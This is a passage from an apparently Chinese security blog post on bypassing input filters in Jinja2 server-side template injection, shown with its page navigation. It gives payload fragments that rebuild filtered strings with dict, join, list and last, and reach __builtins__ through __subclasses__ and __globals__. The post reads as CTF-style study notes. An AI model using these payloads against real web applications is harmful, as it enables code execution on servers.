class="string">'\U0000005F\U0000005F\U00000063\U0000006C\U00000061\U00000073\U00000073\U0000005F\U0000005F'</span>]  <span class="comment">#''.__class__</span></span><br></pre></td></tr></table></figure>

<h3 id="引号被过滤"><a href="#引号被过滤" class="headerlink" title="引号被过滤"></a>引号被过滤</h3><h4 id="dict-与-jion配合"><a href="#dict-与-jion配合" class="headerlink" title="dict 与|jion配合"></a>dict 与|jion配合</h4><p>利用在jinja中dict会将键名转化字符串，再利用|jion作用时只拼接键值的特性绕过。（ps：注意键值唯一！）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;(dict(c=<span class="number">1</span>,l=<span class="number">1</span>,a=<span class="number">1</span>,s=<span class="number">1</span>)|join)~(dict(s=<span class="number">1</span>)|join)&#125;&#125;<span class="comment">#class</span></span><br></pre></td></tr></table></figure>

<h4 id="dict-与-list-、-last配合"><a href="#dict-与-list-、-last配合" class="headerlink" title="dict 与|list 、|last配合"></a>dict 与|list 、|last配合</h4><p>利用dict 构照字典再list转列表提取key值再用last取之。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;dict(a=<span class="number">1</span>)|list|last&#125;&#125; <span class="comment">#a</span></span><br></pre></td></tr></table></figure>

<h4 id="jion与字符串切片提取键值"><a href="#jion与字符串切片提取键值" class="headerlink" title="|jion与字符串切片提取键值"></a>|jion与字符串切片提取键值</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">(<span class="string">''</span>.__class__.__base__.__subclasses__()[<span class="number">91</span>].__init__.__globals__|join)[<span class="number">62</span>:<span class="number">74</span>] <span class="comment">## #|jion 提取 __builtins__</span></span><br><span class="line"></span><br><span class="line">&#123;&#123;(<span class="string">''</span>.__class__.__base__.__subclasses__()[<span class="number">91</span>].__init__.__globals__)[(<span class="string">''</span>.__class__.__base__.__subclasses__()[<span class="number">91</span>].__init__.__globals__|join)[<span class="number">62</span>:<span class="number">74</span>]]&#125;&#125;</span><br></pre></td></tr></table></figure>

<h4 id="list提取字典键值"><a href="#list提取字典键值" class="headerlink" title="|list提取字典键值"></a>|list提取字典键值</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># |list 的作用是字典时会只将字典键值作为转为字符串列表</span></span><br><span class="line"><span class="string">''</span>.__class__.__base__.__subclasses__()[<span class="number">91</span>].__init__.__globals__|list)[<span class="number">7</span>] </span><br><span class="line"><span class="comment"># __builtins__</span></span><br><span class="line">&#123;&#123;<span class="string">''</span>.__class__.__base__.__subclasses__()[<span class="number">91</span>].__init__.__globals__[(<span class="string">''</span>.__class__.__base__.__subclasses__()[<span class="number">91</span>].__init__.__globals__|list)[<span class="number">7</span>]]&#125;&#125;</span><br></pre></td></tr></table></figure>

<h4 id="string-转化出字符拼接"><a href="#string-转化出字符拼接" class="headerlink" title="string 转化出字符拼接"></a>string 转化出字符拼接</h4><p>|string将非字符转化为字符的功能很强大,也可以用转化对象来拼字符.</p>
<h3 id="被过滤"><a href="#被过滤" class="headerlink" title="[]被过滤"></a><code>[]</code>被过滤</h3><h4 id="取属性"><a href="#取属性" class="headerlink" title="取属性"></a>取属性</h4><p>用|attr或 <code>.</code>来代替。</p>
<h4 id="对字典操作"><a href="#对字典操作" class="headerlink" title="对字典操作"></a>对字典操作</h4><p>pop方法(会删除改变字典)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&#123;<span class="string">'a'</span>:<span class="number">1</span>,<span class="string">'b'</span>:<span class="number">2</span>&#125;.pop(<span class="string">'b'</span>)&#125;&#125; <span class="comment">#2</span></span><br></pre></td></tr></table></figure>

<p>get方法</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&#123;<span class="string">'a'</span>:<span class="number">1</span>,<span class="string">'b'</span>:<span class="number">2</span>&#125;.get(<span class="string">'b'</span>)&#125;&#125; <span class="comment">#2</span></span><br></pre></td></tr></table></figure>

<p>setdefault方法(注意若字典里原本不纯在该键值会添加键值)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&#123;<span class="string">'a'</span>:<span class="number">1</span>,<span class="string">'b'</span>:<span class="number">2</span>&#125;.setdefault(<span class="string">'b'</span>)&#125;&#125; <span class="comment">#2</span></span><br></pre></td></tr></table></figure>

<p><code>__getitem__</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&#123;&#39;a&#39;:1,&#39;b&#39;:2&#125;.__getitem__(&#39;b&#39;)&#125;&#125; #2</span><br></pre></td></tr></table></figure>



<h4 id="对列表操作"><a href="#对列表操作" class="headerlink" title="对列表操作"></a>对列表操作</h4><p>pop函数</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;[<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>].pop(<span class="number">1</span>)&#125;&#125; <span class="comment">#2</span></span><br></pre></td></tr></table></figure>

<p><code>__getitem__</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;[<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>].__getitem__(<span class="number">1</span>)&#125;&#125;<span class="comment">#2</span></span><br></pre></td></tr></table></figure>

<p>last</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;[<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>]|last()&#125;&#125;<span class="comment">#3</span></span><br></pre></td></tr></table></figure>



<h1 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h1><p><a href="http://docs.jinkan.org/docs/jinja2/templates.html" target="_blank" rel="noopener">http://docs.jinkan.org/docs/jinja2/templates.html</a></p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2020/11/27/%E5%85%B3%E4%BA%8Ejinja%E7%89%B9%E6%80%A7%E5%AF%B9ssti%E7%9A%84bypass%E7%9A%84%E5%BD%B1%E5%93%8D/">关于jinja2特性对ssti的bypass的影响</a></p>
        <p><span>文章作者:</span><a href="/" title="回到主页">lexsd6</a></p>
        <p><span>发布时间:</span>2020-11-27, 10:08:56</p>
        <p><span>最后更新:</span>2021-01-21, 22:32:31</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2020/11/27/%E5%85%B3%E4%BA%8Ejinja%E7%89%B9%E6%80%A7%E5%AF%B9ssti%E7%9A%84bypass%E7%9A%84%E5%BD%B1%E5%93%8D/" title="关于jinja2特性对ssti的bypass的影响">lexsd6.github.io/2020/11/27/%E5%85%B3%E4%BA%8Ejinja%E7%89%B9%E6%80%A7%E5%AF%B9ssti%E7%9A%84bypass%E7%9A%84%E5%BD%B1%E5%93%8D/</a>
            <span class="copy-path" data-clipboard-text="原文: lexsd6.github.io/2020/11/27/%E5%85%B3%E4%BA%8Ejinja%E7%89%B9%E6%80%A7%E5%AF%B9ssti%E7%9A%84bypass%E7%9A%84%E5%BD%B1%E5%93%8D/　　作者: lexsd6" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" title="CC BY-NC-SA 4.0 International" target = "_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
                <a href="/2020/12/16/linux%20%E5%86%85%E7%BD%AE%E5%8F%82%E6%95%B0%E6%95%B4%E7%90%86/">
                    linux 内置参数整理
                </a>
            </div>
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2020/11/16/%E5%85%B3%E4%BA%8Ephp%E6%89%A7%E8%A1%8C%E4%B8%8E%E6%96%87%E4%BB%B6%E7%B3%BB%E7%BB%9F%E5%A4%84%E7%90%86%E5%87%BD%E6%95%B0%E6%95%B4%E7%90%86/">
                    php执行与文件系统处理函数整理
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">文章目录</strong>
        
            <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#jinja2特性"><span class="toc-text">jinja2特性</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#变量属性"><span class="toc-text">变量属性</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#变量赋值"><span class="toc-text">变量赋值</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#字符串拼接"><span class="toc-text">字符串拼接</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#字符串转码"><span class="toc-text">字符串转码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#过滤器机制"><span class="toc-text">过滤器机制</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#attr"><span class="toc-text">|attr</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#float"><span class="toc-text">|float</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#format"><span class="toc-text">|format</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#join"><span class="toc-text">|join</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#last"><span class="toc-text">|last</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#list"><span class="toc-text">|list</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#lower"><span class="toc-text">|lower</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#string"><span class="toc-text">|string</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#replace"><span class="toc-text">|replace</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#内置函数"><span class="toc-text">内置函数</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#dict"><span class="toc-text">dict</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#bypass"><span class="toc-text">bypass</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#参数关键词字符过滤"><span class="toc-text">参数关键词字符过滤</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#字符拼接"><span class="toc-text">字符拼接</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#字符替换"><span class="toc-text">字符替换</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#进行decode解编码绕过"><span class="toc-text">进行decode解编码绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#利用-string转化字符拼接绕过"><span class="toc-text">利用|string转化字符拼接绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#利用-join来提取"><span class="toc-text">利用|join来提取</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#利用request-args，request-values进行传参"><span class="toc-text">利用request.args，request.values进行传参</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#利用模板渲染编码绕过：（部分新版本）"><span class="toc-text">利用模板渲染编码绕过：（部分新版本）</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#引号被过滤"><span class="toc-text">引号被过滤</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#dict-与-jion配合"><span class="toc-text">dict 与|jion配合</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#dict-与-list-、-last配合"><span class="toc-text">dict 与|list 、|last配合</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#jion与字符串切片提取键值"><span class="toc-text">|jion与字符串切片提取键值</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#list提取字典键值"><span class="toc-text">|list提取字典键值</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#string-转化出字符拼接"><span class="toc-text">string 转化出字符拼接</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#被过滤"><span class="toc-text">[]被过滤</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#取属性"><span class="toc-text">取属性</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#对字典操作"><span class="toc-text">对字典操作</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#对列表操作"><span class="toc-text">对列表操作</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#参考链接"><span class="toc-text">参考链接</span></a></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-4 i,
        .toc-level-4 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

    <script>
        yiliaConfig.toc = ["隐藏目录", "显示目录", !!"false"];
    </script>



    
<div class="share">
    
        <div class="bdsharebuttonbox">
            <a href="#" class="fa fa-twitter bds_twi" data-cmd="twi" title="分享到推特"></a>
            <a href="#" class="fa fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
            <a href="#" class="fa fa-qq bds_sqq" data-cmd="sqq" title="分享给 QQ 好友"></a>
            <a href="#" class="fa fa-files-o bds_copy" data-cmd="copy" title="复制网址"></a>
            <a href="#" class="fa fa fa-envelope-o bds_mail" data-cmd="mail" title="通过邮件分享"></a>
            <a href="#" class="fa fa-weixin bds_weixin" data-cmd="weixin" title="生成文章二维码"></a>
            <a href="#" class="fa fa-share-alt bds_more" data-cmd="more"></i></a>
        </div>
        <script>
            window._bd_share_config={
                "common":{"bdSnsKey":{},"bdText":"关于jinja2特性对ssti的bypass的影响　| lexsd6's home　","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
        </script>
    

    
</div>







    




    <div class="scroll" id="post-nav-button">
        
            <a href="/2020/12/16/linux%20%E5%86%85%E7%BD%AE%E5%8F%82%E6%95%B0%E6%95%B4%E7%90%86/" title="上一篇: linux 内置参数整理">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2020/11/16/%E5%85%B3%E4%BA%8Ephp%E6%89%A7%E8%A1%8C%E4%B8%8E%E6%96%87%E4%BB%B6%E7%B3%BB%E7%BB%9F%E5%A4%84%E7%90%86%E5%87%BD%E6%95%B0%E6%95%B4%E7%90%86/" title="下一篇: php执行与文件系统处理函数整理">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2021/01/31/%E5%85%B3%E4%BA%8Esql%E6%B3%A8%E5%85%A5bypass%E6%80%BB%E7%BB%93/">关于sql注入bypass总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/08/%E5%AE%89%E6%B4%B5%E6%9D%AF2019%E5%A4%8D%E7%8E%B0/">安洵杯2019复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/07/xman%20pwn%E9%A2%98%E5%A4%8D%E7%8E%B0/">xman pwn题复现——学pwn小记（4）</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/12/31/flask.request%E7%9A%84%E5%86%85%E7%BD%AE%E5%B1%9E%E6%80%A7%E6%80%BB%E7%BB%93/">flask.request的内置属性总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/12/21/HWCTF-%E5%8D%8E%E4%B8%BA%E4%BA%91%E5%9C%BAWP/">HWCTF-华为云场WP</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/12/16/linux%20%E5%86%85%E7%BD%AE%E5%8F%82%E6%95%B0%E6%95%B4%E7%90%86/">linux 内置参数整理</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/11/27/%E5%85%B3%E4%BA%8Ejinja%E7%89%B9%E6%80%A7%E5%AF%B9ssti%E7%9A%84bypass%E7%9A%84%E5%BD%B1%E5%93%8D/">关于jinja2特性对ssti的bypass的影响</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/11/16/%E5%85%B3%E4%BA%8Ephp%E6%89%A7%E8%A1%8C%E4%B8%8E%E6%96%87%E4%BB%B6%E7%B3%BB%E7%BB%9F%E5%A4%84%E7%90%86%E5%87%BD%E6%95%B0%E6%95%B4%E7%90%86/">php执行与文件系统处理函数整理</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/11/15/%E7%AC%AC%E4%BA%94%E5%B1%8A%E4%B8%8A%E6%B5%B7%E5%B8%82%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%A4%A7%E8%B5%9B-wp/">第五届上海市大学生网络安全大赛-初赛wp</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/11/12/ctf-show_%E5%8E%9F%E8%B0%85%E6%9D%AFwp/">ctf-show_原谅杯wp</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/10/26/ctf-show%201024%E6%9D%AF/">ctf-show 1024杯</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/10/15/%E5%AD%A6%E4%B9%A0pwn%E5%B0%8F%E8%AE%B0(3)/">学习pwn小记(3)</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/09/22/%E7%AC%AC%E5%8D%81%E4%B8%89%E5%B1%8A%E5%85%A8%E5%9B%BD%E5%A4%A7%E5%AD%A6%E7%94%9F%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B-%E5%88%9B%E6%96%B0%E5%AE%9E%E8%B7%B5%E8%83%BD%E5%8A%9B%E8%B5%9B%E8%A5%BF%E5%8D%97%E8%B5%9B%E5%8C%BA%E9%80%89%E6%8B%94%E8%B5%9Bwp/">第十三届全国大学生信息安全竞赛-创新实践能力赛西南赛区选拔赛wp</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/09/13/%E5%AD%A6%E4%B9%A0pwn%E5%B0%8F%E8%AE%B0(2)/">学习pwn小记(2)</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/09/10/%E5%AF%B9linux%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%9A%84%E6%80%BB%E7%BB%93/">对linux 命令执行的总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/09/09/%E5%AD%A6%E4%B9%A0pwn%E5%B0%8F%E8%AE%B0(1)/">学习pwn小记(1)</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/08/12/SQL%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93/">关于SQL注入小记</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/07/26/%E5%AE%89%E6%81%92DASCTF%207%E6%9C%88%E8%B5%9BWP/">安恒DASCTF 7月赛WP</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/07/15/rgbCTF--wp/">sctf2020 pythonbox题目复现小记</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/06/18/NahamCon%20CTF%20WP/">NahamCon CTF WP</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/05/31/%E5%AF%B9%E4%BA%8E%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E7%9A%84%E7%9F%A5%E8%AF%86%E6%A2%B3%E7%90%86/">对于文件包含漏洞的知识梳理</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/04/26/%E5%85%B3%E4%BA%8Ephp%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%97%E7%AC%A6%E9%80%83%E9%80%B8%E7%9A%84%E6%80%9D%E8%80%83/">关于php反序列化字符逃逸的思考</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/04/23/%E5%A6%82%E4%BD%95%E8%AE%A9%E6%96%87%E4%BB%B6%E9%87%8CPHP%E4%BB%A3%E7%A0%81%E8%A2%AB%E6%9C%8D%E5%8A%A1%E5%99%A8%E8%A7%A3%E6%9E%90%E6%89%A7%E8%A1%8C/">如何让文件里PHP代码被服务器解析执行</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/27/python%20%E5%85%B3%E4%BA%8E%E6%B2%99%E7%9B%92%E9%80%83%E9%80%B8%E7%9A%84%E6%80%9D%E8%80%83/">关于python ssti的思考</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/11/13/%E5%85%B3%E4%BA%8Eupdatexml()%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%E7%9A%84%E6%80%9D%E8%80%83/">关于updatexml()报错注入的思考</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/03/hello-world/">Hello World</a></li></ul>




    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2019-2021 lexsd6
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank" title="快速、简洁且高效的博客框架">Hexo</a>  Theme <a href="https://github.com/MOxFIVE/hexo-theme-yelee" target="_blank" title="简而不减 Hexo 双栏博客主题  v3.5">Yelee</a> by MOxFIVE <i class="fa fa-heart animated infinite pulse"></i>
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" title="本站到访数"><i class="fa fa-user" aria-hidden="true"></i><span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>| </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit"  title="本页阅读量"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>
    </div>
    
<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 10;
                var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#" title="返回顶部"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="查看评论"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="转到底部"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        var oOpenInNew = {
            
            
            
            
            
            
             archives: ".archive-article-title", 
             miniArchives: "a.post-list-link", 
            
             friends: "#js-friends a", 
             socail: ".social a" 
        }
        for (var x in oOpenInNew) {
            $(oOpenInNew[x]).attr("target", "_blank");
        }
    
</script>

    <script>
        var originTitle = document.title;
        var titleTime;
        document.addEventListener("visibilitychange", function() {
            if (document.hidden) {
                document.title = "(つェ⊂) 我藏好了哦~ " + originTitle;
                clearTimeout(titleTime);
            }
            else {
                document.title = "(*´∇｀*) 被你发现啦~ " + originTitle;
                titleTime = setTimeout(function() {
                    document.title = originTitle;
                }, 2000);
            }
        })
    </script>

<script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
  </div>
</body>
</html>